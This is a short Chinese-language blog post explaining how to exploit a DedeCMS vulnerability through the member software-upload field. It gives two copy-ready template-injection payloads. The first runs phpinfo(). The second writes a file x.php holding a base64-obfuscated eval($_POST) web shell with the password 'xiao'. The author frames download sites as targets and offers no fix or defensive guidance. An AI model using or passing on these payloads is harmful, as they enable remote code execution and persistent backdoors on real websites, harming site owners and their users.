最新消息:网站改版咯

dedecms最新漏洞

php Yovae 1921浏览

最近著名织梦CMS爆出最新漏洞,dedecms最新漏洞会让攻击者获得毁灭性的权限,说下dedecms最新漏洞利用方法:注册一个会员,在上传软件栏目:本地地址中填入a{/dede:link}{dede:toby57 name\=”‘]=0;phpinfo();//”}x{/dede:toby57},发表后查看或修改即可执行。
生成的解析文件内容如下:

成功之后的效果

这漏洞鸡肋之处在于经历上次的0day冲击后,很多站点已经关闭了会员功能或者直接删除了member目录,并且没有多少站会有软件栏目的,嗯 ,所以搞搞 下载站之类的差不多了 所以比较悲哀吧,哈哈。

a{/dede:link}{dede:toby57 name\=”‘]=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//”}x{/dede:toby57}

生成x.php 密码:xiao直接生成一句话。密码xiao 这就是利用织梦最新漏洞的方法了。

转载请注明:Yovae Studio » dedecms最新漏洞